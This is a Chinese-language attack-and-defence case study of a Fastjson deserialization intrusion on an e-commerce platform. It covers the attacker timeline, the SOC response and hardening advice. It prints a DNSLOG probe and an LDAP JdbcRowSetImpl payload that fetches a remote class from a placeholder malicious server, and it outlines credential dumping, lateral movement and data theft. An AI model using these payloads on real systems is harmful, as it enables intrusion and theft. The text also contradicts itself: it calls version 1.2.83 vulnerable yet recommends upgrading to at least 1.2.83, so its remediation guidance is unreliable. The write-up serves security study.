攻防实战复盘
Fastjson突防实录:边界告警72小时
2026年07月22日 · 周三
红蓝对抗 高级
场景:某头部电商平台在HVV期间,防守方SOC监测到针对核心交易系统的异常JNDI请求。经研判,确认攻击者利用Fastjson 1.2.83反序列化漏洞尝试远程代码执行。
攻击 / 事件时间线
1
初始访问(Day1 14:30)
攻击者通过互联网出口扫描发现电商平台Web门户的API接口存在异常响应。使用burpsuite发送精心构造的Fastjson payload:{"@type":"java.net.InetAddress","val":"dnslog.cn"},成功触发DNSLOG回显,确认存在Fastjson反序列化漏洞。随后使用{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://恶意服务器/Exploit","autoCommit":true}的LDAP带外payload,成功加载恶意类,建立Cobalt Strike Beacon会话。
Burp SuiteCobalt StrikeFastjson
2
横向移动与持久化(Day1 15:30 - Day2 10:00)
Beacon上线后,攻击者立即执行whoami确认权限为Web应用用户。使用mimikatz抓取本地管理员凭据失败后,转而利用SharpHound收集域信息。发现一台MySQL数据库服务器未配置防火墙规则,通过SMB横向移动到该服务器,并使用procdump转储lsass进程,成功获取域用户凭证。随后在域控服务器上使用SchTask创建计划任务,实现权限维持。
MimikatzSharpHoundProcdump
3
数据窃取与告警触发(Day2 10:30 - Day2 14:00)
攻击者通过域控服务器,访问了部署在DMZ区的核心交易数据库。使用sqlcmd导出150万条用户订单数据(含银行卡号后4位、收货地址),压缩为1.2GB的加密zip包。然而,在通过HTTPS向境外服务器传输数据时,流量被公司新部署的NTA设备捕捉。NTA基于机器学习模型检测到异常大文件上传行为,触发高等级告警。
sqlcmd7-ZipNTA
蓝队视角 · 发现与处置
SOC值班人员收到NTA告警后,立即启动应急响应流程。首先通过EDR隔离受感染的Web服务器,阻断C2通信。同时,安全分析师利用Sysmon日志溯源攻击链路:从IIS日志中定位到触发Fastjson漏洞的原始请求IP,结合DNS日志确认LDAP外联行为。使用YARA规则在受害服务器内存中扫描恶意Beacon,成功提取内存中的C2配置。通过威胁情报平台关联到该C2域名近期活跃,确认为APT组织。最后,通过防火墙封禁攻击源IP,并在WAF上部署临时规则拦截Fastjson特有payload。
涉及关键技术 / 工具
Fastjson 1.2.83反序列化漏洞利用Cobalt Strike与DNSLOG外带技术NTA机器学习异常检测模型
防护经验总结
  • 立即升级Fastjson至最新版本(≥1.2.83),并启用AutoType安全机制,添加白名单过滤。
  • 在生产环境部署NTA设备,配置基于流量大小、目的地址异常度的策略,重点监控出站大文件传输。
  • 在WAF上配置基于Fastjson攻击签名的规则,如检测`@type`、`JdbcRowSetImpl`等关键字,并启用自动拦截模式。
#Fastjson#反序列化#HVV#Cobalt Strike#NTA#安全运营
数据安全早知道 · 攻防实战专栏
⚠️ 免责声明
本文内容源自公开披露的安全事件或高仿真模拟场景,所有涉及的组织、系统、技术细节均经过脱敏处理,仅供安全学习与交流参考,不构成任何技术指导或合规建议。
数安早知道
🔗 数据安全与信息安全知识库 datasafe.website
— 点击上方链接访问知识库,获取更多安全资讯 —